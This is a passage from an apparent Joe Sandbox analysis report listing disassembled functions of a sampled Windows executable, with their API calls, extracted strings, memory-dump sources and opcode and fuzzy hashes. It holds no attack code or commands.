                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                                                  • String ID:
                                                                  • API String ID: 895679908-0
                                                                  • Opcode ID: 337ea3b68fd06c565e17fb85b15621d6d42b6749dbd1a9190605fa39605de5e2
                                                                  • Instruction ID: f56a7e39fab42b98488b1399af15daebecf52a7bc65d0b77d72e3796431fb0d7
                                                                  • Opcode Fuzzy Hash: 337ea3b68fd06c565e17fb85b15621d6d42b6749dbd1a9190605fa39605de5e2
                                                                  • Instruction Fuzzy Hash: 2A718171900705AFDB20EFA8CE45BAEBBF6FF48704F104628F586A66A0D775E944CB50
                                                                  Function 006A086B Relevance: 27.1, APIs: 18, Instructions: 128COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • LoadCursorW.USER32(00000000,00007F89), ref: 006A0884
                                                                  • LoadCursorW.USER32(00000000,00007F8A), ref: 006A088F
                                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 006A089A
                                                                  • LoadCursorW.USER32(00000000,00007F03), ref: 006A08A5
                                                                  • LoadCursorW.USER32(00000000,00007F8B), ref: 006A08B0
                                                                  • LoadCursorW.USER32(00000000,00007F01), ref: 006A08BB
                                                                  • LoadCursorW.USER32(00000000,00007F81), ref: 006A08C6
                                                                  • LoadCursorW.USER32(00000000,00007F88), ref: 006A08D1
                                                                  • LoadCursorW.USER32(00000000,00007F80), ref: 006A08DC
                                                                  • LoadCursorW.USER32(00000000,00007F86), ref: 006A08E7
                                                                  • LoadCursorW.USER32(00000000,00007F83), ref: 006A08F2
                                                                  • LoadCursorW.USER32(00000000,00007F85), ref: 006A08FD
                                                                  • LoadCursorW.USER32(00000000,00007F82), ref: 006A0908
                                                                  • LoadCursorW.USER32(00000000,00007F84), ref: 006A0913
                                                                  • LoadCursorW.USER32(00000000,00007F04), ref: 006A091E
                                                                  • LoadCursorW.USER32(00000000,00007F02), ref: 006A0929
                                                                  • GetCursorInfo.USER32(?), ref: 006A0939
                                                                  • GetLastError.KERNEL32 ref: 006A097B
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Cursor$Load$ErrorInfoLast
                                                                  • String ID:
                                                                  • API String ID: 3215588206-0
                                                                  • Opcode ID: c25a4000625d0d32fa17721244c87e236435197a972f3df5da3655f9f95066d4
                                                                  • Instruction ID: 5bb2467c2177235f2bb9f4999bc2560a2e1c3d6325dd305f54fb20997dd52542
                                                                  • Opcode Fuzzy Hash: c25a4000625d0d32fa17721244c87e236435197a972f3df5da3655f9f95066d4
                                                                  • Instruction Fuzzy Hash: 754154B0D483196EDB109FBA8C8985EBFE9FF04754B50452AE11CEB291DB789801CF91
                                                                  Function 00683A43 Relevance: 26.6, APIs: 8, Strings: 7, Instructions: 400COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: _wcslen
                                                                  • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT$kn
                                                                  • API String ID: 176396367-2507288018
                                                                  • Opcode ID: ef04d6b3486af10306d4de52f8260c778a1150079415b79a098b2b192f670d6d
                                                                  • Instruction ID: cbd38a2d093a356eaf88b019f7cd2eaa46d942618d583ead14b0519a6fb2f46a
                                                                  • Opcode Fuzzy Hash: ef04d6b3486af10306d4de52f8260c778a1150079415b79a098b2b192f670d6d
                                                                  • Instruction Fuzzy Hash: 21E1D331E006369BCB24AF74C8516EDFBB7BF54B50F14421AE456E7350DB30AE558B90
                                                                  Function 006B9B7A Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 181windowfileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 0062249F: GetWindowLongW.USER32(00000000,000000EB), ref: 006224B0
                                                                  • DragQueryPoint.SHELL32(?,?), ref: 006B9BA3
                                                                    • Part of subcall function 006B80AE: ClientToScreen.USER32(?,?), ref: 006B80D4
                                                                    • Part of subcall function 006B80AE: GetWindowRect.USER32(?,?), ref: 006B814A
                                                                    • Part of subcall function 006B80AE: PtInRect.USER32(?,?,?), ref: 006B815A
                                                                  • SendMessageW.USER32(?,000000B0,?,?), ref: 006B9C0C
                                                                  • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 006B9C17
                                                                  • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 006B9C3A
                                                                  • SendMessageW.USER32(?,000000C2,00000001,?), ref: 006B9C81
                                                                  • SendMessageW.USER32(?,000000B0,?,?), ref: 006B9C9A
                                                                  • SendMessageW.USER32(?,000000B1,?,?), ref: 006B9CB1
                                                                  • SendMessageW.USER32(?,000000B1,?,?), ref: 006B9CD3
                                                                  • DragFinish.SHELL32(?), ref: 006B9CDA
                                                                  • DefDlgProcW.USER32(?,00000233,?,00000000), ref: 006B9DCD
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
                                                                  • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$(o$(o
                                                                  • API String ID: 221274066-869869807
                                                                  • Opcode ID: 900e23ebb7807d3ad5de1b267d43fcc871eac2a75bcb46fa7fc7fee9a98a5215
                                                                  • Instruction ID: c442fb68168ba8e07a2f383879cd1ab2a180c369dfc07fc704f238159a94840d
                                                                  • Opcode Fuzzy Hash: 900e23ebb7807d3ad5de1b267d43fcc871eac2a75bcb46fa7fc7fee9a98a5215
                                                                  • Instruction Fuzzy Hash: 1C616AB1108301AFC705EF54DC85DABBBEAEF88750F000A2DF691972A1DB709A49CF56
                                                                  Function 00640436 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 81COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 00640436
                                                                    • Part of subcall function 0064045D: InitializeCriticalSectionAndSpinCount.KERNEL32(006F170C,00000FA0,3A44EFDA,?,?,?,?,00662733,000000FF), ref: 0064048C
                                                                    • Part of subcall function 0064045D: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,00662733,000000FF), ref: 00640497
                                                                    • Part of subcall function 0064045D: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,00662733,000000FF), ref: 006404A8
                                                                    • Part of subcall function 0064045D: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 006404BE
                                                                    • Part of subcall function 0064045D: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 006404CC
                                                                    • Part of subcall function 0064045D: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 006404DA
                                                                    • Part of subcall function 0064045D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00640505
                                                                    • Part of subcall function 0064045D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00640510
                                                                  • ___scrt_fastfail.LIBCMT ref: 00640457
                                                                    • Part of subcall function 00640413: __onexit.LIBCMT ref: 00640419
                                                                  Strings
                                                                  • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00640492
                                                                  • InitializeConditionVariable, xrefs: 006404B8
                                                                  • WakeAllConditionVariable, xrefs: 006404D2
                                                                  • SleepConditionVariableCS, xrefs: 006404C4
                                                                  • kernel32.dll, xrefs: 006404A3
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                                                  • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                  • API String ID: 66158676-1714406822
                                                                  • Opcode ID: 8f09aef015ccdb204de0f3f1c96efe77a82661d74f143ec66f81f7521b626dca
                                                                  • Instruction ID: 8aaea7015068ce89b7dd4b766811c804251913ea3dd8d572e880c5322edb003f
                                                                  • Opcode Fuzzy Hash: 8f09aef015ccdb204de0f3f1c96efe77a82661d74f143ec66f81f7521b626dca
                                                                  • Instruction Fuzzy Hash: 2E21F972A40725EBF7142BA4AC46FB937DBEF05BA1F011229FB059B380EF709C408A54
                                                                  Function 00694F05 Relevance: 24.8, APIs: 7, Strings: 7, Instructions: 309COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CharLowerBuffW.USER32(00000000,00000000,006BDCD0), ref: 00694F6C
                                                                  • _wcslen.LIBCMT ref: 00694F80
                                                                  • _wcslen.LIBCMT ref: 00694FDE
                                                                  • _wcslen.LIBCMT ref: 00695039
                                                                  • _wcslen.LIBCMT ref: 00695084
                                                                  • _wcslen.LIBCMT ref: 006950EC
                                                                    • Part of subcall function 0063FD52: _wcslen.LIBCMT ref: 0063FD5D
                                                                  • GetDriveTypeW.KERNEL32(?,006E7C10,00000061), ref: 00695188
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: _wcslen$BuffCharDriveLowerType
                                                                  • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                  • API String ID: 2055661098-1000479233
                                                                  • Opcode ID: b1d69fec5797b613c4ac84113adf869ac4d344d36fae53c06086d522c518413d
                                                                  • Instruction ID: 310e9c6bd09cb7fdd8d57c7a067f2c4ce962fd8ee21e30b526a1e1da0d8eff2e
                                                                  • Opcode Fuzzy Hash: b1d69fec5797b613c4ac84113adf869ac4d344d36fae53c06086d522c518413d
                                                                  • Instruction Fuzzy Hash: 9BB104316087029FCB10EF28D891AAAB7EBBF94724F10491DF496C7791DB30D885CB92
                                                                  Function 006ABA59 Relevance: 24.4, APIs: 16, Instructions: 418processCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _wcslen.LIBCMT ref: 006ABBF8
                                                                  • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 006ABC10
                                                                  • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 006ABC34
                                                                  • _wcslen.LIBCMT ref: 006ABC60
                                                                  • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 006ABC74
                                                                  • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 006ABC96
                                                                  • _wcslen.LIBCMT ref: 006ABD92
                                                                    • Part of subcall function 00690F4E: GetStdHandle.KERNEL32(000000F6), ref: 00690F6D
                                                                  • _wcslen.LIBCMT ref: 006ABDAB
                                                                  • _wcslen.LIBCMT ref: 006ABDC6
                                                                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 006ABE16
                                                                  • GetLastError.KERNEL32(00000000), ref: 006ABE67
                                                                  • CloseHandle.KERNEL32(?), ref: 006ABE99
                                                                  • CloseHandle.KERNEL32(00000000), ref: 006ABEAA
                                                                  • CloseHandle.KERNEL32(00000000), ref: 006ABEBC
                                                                  • CloseHandle.KERNEL32(00000000), ref: 006ABECE
                                                                  • CloseHandle.KERNEL32(?), ref: 006ABF43
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
                                                                  • String ID:
                                                                  • API String ID: 2178637699-0
                                                                  • Opcode ID: 2df2efee9d20ace2b584c0f52460ad69626fdb5e4f216f79e0219dbfb248d48f
                                                                  • Instruction ID: b6d4259ba05ca1b33baf86a013825ba890ff4157d1af0cab226b1bf6aa3ebda0
                                                                  • Opcode Fuzzy Hash: 2df2efee9d20ace2b584c0f52460ad69626fdb5e4f216f79e0219dbfb248d48f
                                                                  • Instruction Fuzzy Hash: 16F19D716043509FC754EF24C891BAABBE6AF86310F18855DF8868B2A2DB31EC45CF56
                                                                  Function 006A4A46 Relevance: 23.2, APIs: 11, Strings: 2, Instructions: 478libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,006BDCD0), ref: 006A4B18
                                                                  • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 006A4B2A
                                                                  • GetModuleFileNameW.KERNEL32(?,?,00000104,?,?,?,006BDCD0), ref: 006A4B4F
                                                                  • FreeLibrary.KERNEL32(00000000,?,006BDCD0), ref: 006A4B9B
                                                                  • StringFromGUID2.OLE32(?,?,00000028,?,006BDCD0), ref: 006A4C05
                                                                  • SysFreeString.OLEAUT32(00000009), ref: 006A4CBF
                                                                  • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 006A4D25
                                                                  • SysFreeString.OLEAUT32(?), ref: 006A4D4F
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: FreeString$Library$AddressFileFromLoadModuleNamePathProcQueryType
                                                                  • String ID: GetModuleHandleExW$kernel32.dll
                                                                  • API String ID: 354098117-199464113
                                                                  • Opcode ID: cff990457cafa47acd72a52eb54149630b3a2d1d7dcb29a07c43b3de150ec3ed
                                                                  • Instruction ID: 0f78649457bad89351ddfab64e9dc94ade715608e8a0f73b02143d3359d3fdf3
                                                                  • Opcode Fuzzy Hash: cff990457cafa47acd72a52eb54149630b3a2d1d7dcb29a07c43b3de150ec3ed
                                                                  • Instruction Fuzzy Hash: 0F120A71A00115EFDB14EF54C884EAAB7B6FF86314F148098F9199B251DBB1ED46CFA0
                                                                  Function 0062381F Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 214windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetMenuItemCount.USER32(006F29C0), ref: 00663F72
                                                                  • GetMenuItemCount.USER32(006F29C0), ref: 00664022
                                                                  • GetCursorPos.USER32(?), ref: 00664066
                                                                  • SetForegroundWindow.USER32(00000000), ref: 0066406F
                                                                  • TrackPopupMenuEx.USER32(006F29C0,00000000,?,00000000,00000000,00000000), ref: 00664082
                                                                  • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 0066408E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                                                                  • String ID: 0
                                                                  • API String ID: 36266755-4108050209
                                                                  • Opcode ID: de2cec3dd285ae7e836ce4eebc554d9d9135922530b01f879a9f25b41df6cfd7
                                                                  • Instruction ID: c3de9e2699e2d9ee5d24571a6cc977f7329b9286df22723c681504c5818160a4
                                                                  • Opcode Fuzzy Hash: de2cec3dd285ae7e836ce4eebc554d9d9135922530b01f879a9f25b41df6cfd7
                                                                  • Instruction Fuzzy Hash: FD710671644226BFEB219F29DC49FEABFA6FF04364F100216F6146A3D1C7B5A950CB50
                                                                  Function 006B7711 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 194windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • DestroyWindow.USER32(00000000,?), ref: 006B7823
                                                                    • Part of subcall function 00628577: _wcslen.LIBCMT ref: 0062858A
                                                                  • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 006B7897
                                                                  • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 006B78B9
                                                                  • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 006B78CC
                                                                  • DestroyWindow.USER32(?), ref: 006B78ED
                                                                  • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00620000,00000000), ref: 006B791C
                                                                  • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 006B7935
                                                                  • GetDesktopWindow.USER32 ref: 006B794E
                                                                  • GetWindowRect.USER32(00000000), ref: 006B7955
                                                                  • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 006B796D
                                                                  • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 006B7985
                                                                    • Part of subcall function 00622234: GetWindowLongW.USER32(?,000000EB), ref: 00622242
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
                                                                  • String ID: 0$tooltips_class32
                                                                  • API String ID: 2429346358-3619404913
                                                                  • Opcode ID: 7add732a78c8885bcba6cf578c014589b3e2d5c4bc1c221866fbd3e71c03c8f7
                                                                  • Instruction ID: 60351f87b1e77dddfc047f7581ebbe49eabb0285fd3eb64270b38e8e97325771
                                                                  • Opcode Fuzzy Hash: 7add732a78c8885bcba6cf578c014589b3e2d5c4bc1c221866fbd3e71c03c8f7
                                                                  • Instruction Fuzzy Hash: 68718AB0104245AFD725DF18CC48FAABBEAFBC9300F04456DF9958B2A1DB70A986CF11
                                                                  Function 0062146D Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 168timeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00621802: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00621488,?,00000000,?,?,?,?,0062145A,00000000,?), ref: 00621865
                                                                  • DestroyWindow.USER32(?), ref: 00621521
                                                                  • KillTimer.USER32(00000000,?,?,?,?,0062145A,00000000,?), ref: 006215BB
                                                                  • DestroyAcceleratorTable.USER32(00000000), ref: 006629B4
                                                                  • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,0062145A,00000000,?), ref: 006629E2
                                                                  • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,0062145A,00000000,?), ref: 006629F9
                                                                  • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,0062145A,00000000), ref: 00662A15
                                                                  • DeleteObject.GDI32(00000000), ref: 00662A27
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                  • String ID: <)o
                                                                  • API String ID: 641708696-1266362052
                                                                  • Opcode ID: 8c1bba747419546a6dd857a2cbb7e1eda97655215a1f8f4da5a10f3a3a016f2a
                                                                  • Instruction ID: 870b699ff375b9cabefb2f4613a2108d1aa60c00887ed4e47a119378f45480ef
                                                                  • Opcode Fuzzy Hash: 8c1bba747419546a6dd857a2cbb7e1eda97655215a1f8f4da5a10f3a3a016f2a
                                                                  • Instruction Fuzzy Hash: A7618B70509B22DFDB359F15E968B7977F3FB92322F10A118E4429B660C7B1A881CF85
                                                                  Function 0069CEBB Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 143networkCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0069CEF5
                                                                  • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0069CF08
                                                                  • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0069CF1C
                                                                  • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0069CF35
                                                                  • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 0069CF78
                                                                  • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0069CF8E
                                                                  • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0069CF99
                                                                  • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0069CFC9
                                                                  • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0069D021
                                                                  • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0069D035
                                                                  • InternetCloseHandle.WININET(00000000), ref: 0069D040
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                                                  • String ID:
                                                                  • API String ID: 3800310941-3916222277
                                                                  • Opcode ID: 3478778643e36843664bbbe4a0c7828c9f22d4565e65dc4debafb694f15d4962
                                                                  • Instruction ID: 9345011556356f7ec12ed4af7b0958b957fd750b2446ad29bb8784f9e2a05786
                                                                  • Opcode Fuzzy Hash: 3478778643e36843664bbbe4a0c7828c9f22d4565e65dc4debafb694f15d4962
                                                                  • Instruction Fuzzy Hash: 43517FB1500604BFDB219F60CC88AEB7BFEFF09794F00452AF94596651E734D945EB60
                                                                  Function 006B8FCB Relevance: 22.6, APIs: 15, Instructions: 131filecommemoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,006B66D6,?,?), ref: 006B8FEE
